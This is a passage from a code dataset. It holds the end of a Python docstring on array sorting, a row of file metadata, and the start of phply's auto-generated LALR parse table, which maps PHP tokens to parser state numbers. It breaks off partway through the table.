sort stability. If ``True``, the returned array must maintain the relative order of ``x`` values which compare as equal. If ``False``, the returned array may or may not maintain the relative order of ``x`` values which compare as equal (i.e., the relative order of ``x`` values which compare as equal is implementation-dependent). Default: ``True``.
Returns
-------
out : array
a sorted array. The returned array must have the same data type and shape as ``x``.
"""
__all__ = ['argsort', 'sort'] | 50.866667 | 361 | 0.642202 | 331 | 2,289 | 4.425982 | 0.205438 | 0.067577 | 0.065529 | 0.07372 | 0.85529 | 0.845734 | 0.776792 | 0.734471 | 0.688055 | 0.688055 | 0 | 0.003413 | 0.231979 | 2,289 | 45 | 362 | 50.866667 | 0.82992 | 0.820882 | 0 | 0 | 0 | 0 | 0.041045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
7178990f5d3a0aa6ca96ea59b18bdc4205863e72 | 315,411 | py | Python | Lib/site-packages/phply/parsetab.py | TencentCodeDog/win-Python-v3.7.0 | 72275357ffaa349bd4eb65242551c3dd09546367 | [
"bzip2-1.0.6"
] | null | null | null | Lib/site-packages/phply/parsetab.py | TencentCodeDog/win-Python-v3.7.0 | 72275357ffaa349bd4eb65242551c3dd09546367 | [
"bzip2-1.0.6"
] | null | null | null | Lib/site-packages/phply/parsetab.py | TencentCodeDog/win-Python-v3.7.0 | 72275357ffaa349bd4eb65242551c3dd09546367 | [
"bzip2-1.0.6"
] | null | null | null |
# parsetab.py
# This file is automatically generated. Do not edit.
_tabversion = '3.8'
_lr_method = 'LALR'
_lr_signature = 'D412AF7EB99FD2C50A0DCDF22BEEB04A'
_lr_action_items = {'HALT_COMPILER':([0,2,3,4,5,6,7,10,13,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,500,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,820,825,832,835,836,841,862,867,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,8,-3,-2,-4,-5,-6,-50,-443,-47,-443,290,-23,-48,-38,-40,-42,-443,-8,-443,8,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,290,-56,-7,8,-9,-28,-443,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,290,290,-51,-55,290,-110,-31,-64,-34,-85,-443,-443,-443,-109,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,290,-61,290,290,-443,-35,-76,-443,290,-443,290,-88,-54,-108,-32,290,290,290,-63,-84,-443,-443,-77,290,-443,290,-52,290,]),'NAMESPACE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,275,276,277,284,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,365,369,371,375,389,404,407,423,424,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,491,499,500,501,503,504,513,528,532,533,535,537,540,545,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,656,657,661,679,682,693,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,776,781,796,803,806,811,813,814,820,822,825,826,831,832,835,836,839,841,851,852,860,861,862,867,868,869,870,871,874,875,87
6,877,878,881,882,883,884,892,894,898,899,907,908,909,910,911,912,913,914,915,917,918,924,925,927,928,931,934,935,937,938,940,944,951,954,955,962,963,964,967,969,971,972,973,975,976,],[-443,11,-3,-2,-4,-5,-6,112,-50,-443,112,112,112,112,112,-47,112,211,112,112,112,112,112,112,231,231,112,112,112,112,112,112,112,112,112,112,112,112,112,112,-443,112,112,-23,112,-48,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,-38,-40,-42,231,231,-443,112,112,112,112,112,112,112,112,112,112,112,112,112,231,112,231,231,112,112,112,112,112,112,112,-8,-443,11,231,-30,-22,-24,-25,-26,112,-11,466,-12,112,112,-39,-41,-43,-44,112,-45,466,-46,112,112,-56,211,518,518,112,112,112,112,112,231,112,112,112,-7,11,-9,112,112,-28,466,466,466,466,112,112,112,112,112,112,112,231,231,-443,112,466,211,518,112,112,231,231,231,231,231,112,112,112,112,-10,-29,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,-443,-443,112,112,-33,-70,-443,231,-37,-49,-443,-53,-57,-60,-443,211,466,518,-111,518,112,112,112,-27,466,466,-443,-62,112,112,112,231,231,-51,-55,112,466,466,466,-110,518,231,112,112,-31,-64,112,-34,112,-85,112,518,-443,-443,-443,466,-109,466,-443,466,112,-65,-71,112,-36,-83,-443,-443,-92,-93,-86,-87,112,-61,112,112,-443,466,518,-123,112,-443,-35,-76,-443,112,-443,112,-88,-54,-108,466,518,211,466,-122,112,-32,112,112,112,211,-63,-84,-443,-443,-77,112,-443,-126,-128,112,-52,112,-127,]),'CONST':([0,2,3,4,5,6,7,10,29,114,130,164,166,168,275,276,277,285,292,295,345,346,347,348,352,355,361,441,442,443,500,519,566,613,620,621,630,634,636,637,638,639,650,654,655,657,740,741,759,762,774,776,777,811,813,820,825,841,844,862,867,869,870,877,878,882,890,893,909,910,915,917,918,935,946,951,954,963,968,973,974,977,],[-443,14,-3,-2,-4,-5,-6,-50,-47,-443,-48,-38,-40,-42,-8,-443,14,-30,-11,-12,-39,-41,-43,-44,-45,-46,-56,-7,14,-9,-443,-443,-10,-443,-33,-70,-37,-49,-443,-53,-57,-60,-443,782,-13
6,-111,-443,-62,-51,-55,782,-110,-135,-31,-64,-34,-85,-109,-139,-65,-71,-36,-83,-86,-87,-61,-138,-141,-35,-76,-88,-54,-108,-32,-140,-63,-84,-77,-157,-52,-137,-156,]),'USE':([0,2,3,4,5,6,7,10,29,114,130,164,166,168,275,276,277,285,292,295,345,346,347,348,352,355,361,373,441,442,443,500,519,522,523,566,613,620,621,630,634,636,637,638,639,644,650,654,655,657,658,740,741,759,762,774,776,777,811,813,820,825,841,844,849,853,862,867,869,870,877,878,882,890,893,909,910,915,917,918,930,935,946,951,954,963,966,968,973,974,977,],[-443,15,-3,-2,-4,-5,-6,-50,-47,-443,-48,-38,-40,-42,-8,-443,15,-30,-11,-12,-39,-41,-43,-44,-45,-46,-56,-443,-7,15,-9,-443,-443,661,-130,-10,-443,-33,-70,-37,-49,-443,-53,-57,-60,767,-443,781,-136,-111,-129,-443,-62,-51,-55,781,-110,-135,-31,-64,-34,-85,-109,-139,-132,-134,-65,-71,-36,-83,-86,-87,-61,-138,-141,-35,-76,-88,-54,-108,-133,-32,-140,-63,-84,-77,-131,-157,-52,-137,-156,]),'LBRACE':([0,2,3,4,5,6,7,10,11,12,13,17,19,29,31,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,105,106,107,109,111,113,114,116,117,120,121,130,131,164,165,166,167,168,169,173,178,180,181,187,188,189,190,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,256,259,260,261,269,271,273,275,276,277,278,279,283,285,286,287,288,289,292,295,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,345,346,347,348,352,355,360,361,367,368,370,372,374,376,377,378,379,380,381,382,383,384,385,386,388,390,391,392,394,395,402,410,411,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,441,442,443,445,449,450,472,473,477,478,480,481,482,483,484,486,487,492,494,497,500,501,511,512,514,515,516,520,521,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,566,570,613,614,618,619,620,621,622,623,625,630,634,636,637,638,639,640,644,651,652
,657,673,674,675,676,677,685,686,695,698,701,702,703,740,741,742,743,745,746,759,761,762,763,765,766,768,775,776,783,787,789,790,791,792,794,795,797,798,800,801,802,804,805,811,813,814,817,818,820,822,825,832,835,836,841,846,854,856,862,867,868,869,870,871,873,874,875,876,877,878,881,882,883,884,900,902,903,905,908,909,910,911,912,913,914,915,917,918,919,920,934,935,936,937,938,940,941,951,954,955,958,962,963,964,965,967,972,973,975,],[-443,13,-3,-2,-4,-5,-6,-50,114,-362,-443,132,13,-47,180,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,268,270,-237,-239,132,-190,276,-443,-429,-430,13,-23,-48,304,-38,132,-40,132,-42,132,351,132,-443,132,-370,-443,-443,373,-323,-324,-443,-185,-186,-187,-192,-225,268,-198,132,-315,-316,-317,-318,-321,268,-322,-325,-326,-327,-328,-329,-330,-331,132,-338,-339,-340,-341,-347,-348,304,-363,429,432,-227,268,-349,-8,-443,13,-364,-428,132,-30,-22,-24,-25,-26,-11,-12,132,-443,-443,-244,-248,-250,132,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,132,132,132,132,132,-39,-41,-43,-44,-45,-46,13,-56,-443,-115,519,-151,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,528,-188,304,532,-253,429,432,132,132,-345,132,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,132,132,-7,13,-9,-209,-28,132,268,270,13,-184,-221,617,-245,132,-238,-320,13,631,132,132,-443,13,-353,650,-121,-116,-117,-150,-149,-182,-234,-229,-189,-443,-230,-252,132,132,-333,-336,-337,-346,-443,132,-361,132,132,-218,-235,-236,-240,-10,-29,-443,-443,-249,-319,-33,-70,-443,132,132,-37,-49,-443,-53,-57,-60,-443,-443,-120,-118,-111,-196,132,-191,-194,132,-205,-223,-210,-231,-232,-211,-27,-443,-62,13,-220,132,13,-51,832,-55,13,835,836,-273,-119,-110,-148,852,-231,304,-193,-232,-199,132,304,-222,132,-212,-213,-214,-215,-31,-64,13,-246,-247,-34,13,-85,-443,-443,-443,-109,892,-195,-443,-65,-71,13,-3
6,-83,-443,132,-443,-92,-93,-86,-87,13,-61,13,13,-224,-216,-217,132,-443,-35,-76,-443,13,-443,13,-88,-54,-108,-271,-272,13,-32,132,13,13,13,955,-63,-84,-443,967,-443,-77,13,967,-443,13,-52,13,]),'IF':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,16,-3,-2,-4,-5,-6,-50,-443,16,-47,-443,16,-23,-48,-38,-40,-42,-443,-8,-443,16,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,16,-56,-7,16,-9,-28,16,16,-443,16,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,16,16,-51,-55,16,-110,-31,-64,16,-34,16,-85,-443,-443,-443,-109,-65,-71,16,-36,-83,-443,-443,-92,-93,-86,-87,16,-61,16,16,-443,-35,-76,-443,16,-443,16,-88,-54,-108,16,-32,16,16,16,-63,-84,-443,-443,-77,16,-443,16,-52,16,]),'WHILE':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,160,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,18,-3,-2,-4,-5,-6,-50,-443,18,-47,-443,18,-23,-48,338,-38,-40,-42,-443,-8,-443,18,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,18,-56,-7,18,-9,-28,18,18,-443,18,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,18,18,-51,-55,18,-110,-31,-64,18,-34,18,-85,-443,-443,-443,-109,-65,-71,18,-36,-83,-443,-443,-92,-93,-86,-87,18,-61,18,18,-443,-35,-76,-443
,18,-443,18,-88,-54,-108,18,-32,18,18,18,-63,-84,-443,-443,-77,18,-443,18,-52,18,]),'DO':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,19,-3,-2,-4,-5,-6,-50,-443,19,-47,-443,19,-23,-48,-38,-40,-42,-443,-8,-443,19,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,19,-56,-7,19,-9,-28,19,19,-443,19,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,19,19,-51,-55,19,-110,-31,-64,19,-34,19,-85,-443,-443,-443,-109,-65,-71,19,-36,-83,-443,-443,-92,-93,-86,-87,19,-61,19,19,-443,-35,-76,-443,19,-443,19,-88,-54,-108,19,-32,19,19,19,-63,-84,-443,-443,-77,19,-443,19,-52,19,]),'FOR':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,20,-3,-2,-4,-5,-6,-50,-443,20,-47,-443,20,-23,-48,-38,-40,-42,-443,-8,-443,20,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,20,-56,-7,20,-9,-28,20,20,-443,20,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,20,20,-51,-55,20,-110,-31,-64,20,-34,20,-85,-443,-443,-443,-109,-65,-71,20,-36,-83,-443,-443,-92,-93,-86,-87,20,-61,20,20,-443,-35,-76,-443,20,-443,20,-88,-54,-108,20,-32,20,20,20,-63,-84,-443,-443,-77,20,-443,20,-52,20,]),'FOREACH':([0,2,3,4,5,6,7,10,13,19,29
,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,21,-3,-2,-4,-5,-6,-50,-443,21,-47,-443,21,-23,-48,-38,-40,-42,-443,-8,-443,21,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,21,-56,-7,21,-9,-28,21,21,-443,21,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,21,21,-51,-55,21,-110,-31,-64,21,-34,21,-85,-443,-443,-443,-109,-65,-71,21,-36,-83,-443,-443,-92,-93,-86,-87,21,-61,21,21,-443,-35,-76,-443,21,-443,21,-88,-54,-108,21,-32,21,21,21,-63,-84,-443,-443,-77,21,-443,21,-52,21,]),'SWITCH':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,22,-3,-2,-4,-5,-6,-50,-443,22,-47,-443,22,-23,-48,-38,-40,-42,-443,-8,-443,22,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,22,-56,-7,22,-9,-28,22,22,-443,22,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,22,22,-51,-55,22,-110,-31,-64,22,-34,22,-85,-443,-443,-443,-109,-65,-71,22,-36,-83,-443,-443,-92,-93,-86,-87,22,-61,22,22,-443,-35,-76,-443,22,-443,22,-88,-54,-108,22,-32,22,22,22,-63,-84,-443,-443,-77,22,-443,22,-52,22,]),'BREAK':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,44
3,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,23,-3,-2,-4,-5,-6,-50,-443,23,-47,-443,23,-23,-48,-38,-40,-42,-443,-8,-443,23,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,23,-56,-7,23,-9,-28,23,23,-443,23,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,23,23,-51,-55,23,-110,-31,-64,23,-34,23,-85,-443,-443,-443,-109,-65,-71,23,-36,-83,-443,-443,-92,-93,-86,-87,23,-61,23,23,-443,-35,-76,-443,23,-443,23,-88,-54,-108,23,-32,23,23,23,-63,-84,-443,-443,-77,23,-443,23,-52,23,]),'CONTINUE':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,24,-3,-2,-4,-5,-6,-50,-443,24,-47,-443,24,-23,-48,-38,-40,-42,-443,-8,-443,24,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,24,-56,-7,24,-9,-28,24,24,-443,24,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,24,24,-51,-55,24,-110,-31,-64,24,-34,24,-85,-443,-443,-443,-109,-65,-71,24,-36,-83,-443,-443,-92,-93,-86,-87,24,-61,24,24,-443,-35,-76,-443,24,-443,24,-88,-54,-108,24,-32,24,24,24,-63,-84,-443,-443,-77,24,-443,24,-52,24,]),'RETURN':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,76
3,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,25,-3,-2,-4,-5,-6,-50,-443,25,-47,-443,25,-23,-48,-38,-40,-42,-443,-8,-443,25,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,25,-56,-7,25,-9,-28,25,25,-443,25,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,25,25,-51,-55,25,-110,-31,-64,25,-34,25,-85,-443,-443,-443,-109,-65,-71,25,-36,-83,-443,-443,-92,-93,-86,-87,25,-61,25,25,-443,-35,-76,-443,25,-443,25,-88,-54,-108,25,-32,25,25,25,-63,-84,-443,-443,-77,25,-443,25,-52,25,]),'GLOBAL':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,26,-3,-2,-4,-5,-6,-50,-443,26,-47,-443,26,-23,-48,-38,-40,-42,-443,-8,-443,26,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,26,-56,-7,26,-9,-28,26,26,-443,26,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,26,26,-51,-55,26,-110,-31,-64,26,-34,26,-85,-443,-443,-443,-109,-65,-71,26,-36,-83,-443,-443,-92,-93,-86,-87,26,-61,26,26,-443,-35,-76,-443,26,-443,26,-88,-54,-108,26,-32,26,26,26,-63,-84,-443,-443,-77,26,-443,26,-52,26,]),'STATIC':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,26
5,267,268,270,275,276,277,284,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,365,373,375,389,404,407,423,424,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,491,499,500,501,503,504,519,522,523,528,532,533,535,537,540,545,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,650,654,655,657,658,662,665,666,667,668,669,670,671,672,679,682,693,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,774,776,777,788,796,803,806,811,813,814,820,822,825,826,832,835,836,839,841,844,849,851,853,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,890,893,894,907,908,909,910,911,912,913,914,915,917,918,924,927,928,930,934,935,937,938,940,944,946,951,954,955,962,963,964,966,967,968,972,973,974,975,977,],[-443,27,-3,-2,-4,-5,-6,111,-50,-443,27,111,111,111,111,-47,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,-443,111,27,-23,111,-48,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,334,111,111,111,111,111,-38,-40,-42,111,111,-443,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,-8,-443,27,111,-30,-22,-24,-25,-26,111,-11,111,-12,111,111,-39,-41,-43,-44,111,-45,111,-46,111,27,-56,111,-443,111,111,111,111,111,111,111,111,111,-7,27,-9,111,111,-28,111,111,111,111,27,111,111,27,111,111,111,111,111,-443,27,111,111,-443,667,-130,111,111,111,111,111,111,111,111,111,111,111,-10,-29,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,-443,-443,111,111,-33,-70,-443,111,-37,-49,-443,-53,-57,-60,-443,111,111,-443,667,-136,-111,-129,667,-159,-163,-164,-165,-166,-160,-161,-162,111,111,111,-27,111,111,-443,-62,27,27,111,111,111,-51,-55,27,111,111,111,667,-110,-135,-158,111,1
11,111,-31,-64,27,-34,27,-85,111,-443,-443,-443,111,-109,-139,-132,111,-134,111,111,-65,-71,27,-36,-83,-443,-443,-92,-93,-86,-87,27,-61,27,27,-138,-141,111,111,-443,-35,-76,-443,27,-443,27,-88,-54,-108,111,111,111,-133,27,-32,27,27,27,111,-140,-63,-84,-443,-443,-77,27,-131,-443,-157,27,-52,-137,27,-156,]),'ECHO':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,28,-3,-2,-4,-5,-6,-50,-443,28,-47,-443,28,-23,-48,-38,-40,-42,-443,-8,-443,28,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,28,-56,-7,28,-9,-28,28,28,-443,28,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,28,28,-51,-55,28,-110,-31,-64,28,-34,28,-85,-443,-443,-443,-109,-65,-71,28,-36,-83,-443,-443,-92,-93,-86,-87,28,-61,28,28,-443,-35,-76,-443,28,-443,28,-88,-54,-108,28,-32,28,28,28,-63,-84,-443,-443,-77,28,-443,28,-52,28,]),'INLINE_HTML':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,29,-3,-2,-4,-5,-6,-50,-443,29,-47,-443,29,-23,-48,-38,-40,-42,-443,-8,-443,29,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,29,-56,-7,29,-9,-28,29,29,-443,29,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,29,29,-51,-55,29,-110,-31,-
64,29,-34,29,-85,-443,-443,-443,-109,-65,-71,29,-36,-83,-443,-443,-92,-93,-86,-87,29,-61,29,29,-443,-35,-76,-443,29,-443,29,-88,-54,-108,29,-32,29,29,29,-63,-84,-443,-443,-77,29,-443,29,-52,29,]),'UNSET':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,30,-3,-2,-4,-5,-6,-50,-443,30,-47,-443,30,-23,-48,-38,-40,-42,-443,-8,-443,30,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,30,-56,-7,30,-9,-28,30,30,-443,30,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,30,30,-51,-55,30,-110,-31,-64,30,-34,30,-85,-443,-443,-443,-109,-65,-71,30,-36,-83,-443,-443,-92,-93,-86,-87,30,-61,30,30,-443,-35,-76,-443,30,-443,30,-88,-54,-108,30,-32,30,30,30,-63,-84,-443,-443,-77,30,-443,30,-52,30,]),'SEMI':([0,2,3,4,5,6,7,10,12,13,17,19,23,24,25,29,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,113,114,116,117,120,121,122,123,125,126,127,130,161,164,165,166,167,168,169,170,171,172,174,175,176,177,178,180,181,187,203,204,206,207,208,209,212,213,214,216,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,272,273,275,276,277,278,279,285,286,287,288,289,291,292,295,298,300,301,302,303,305,309,310,311,312,313,314,315,316,317,3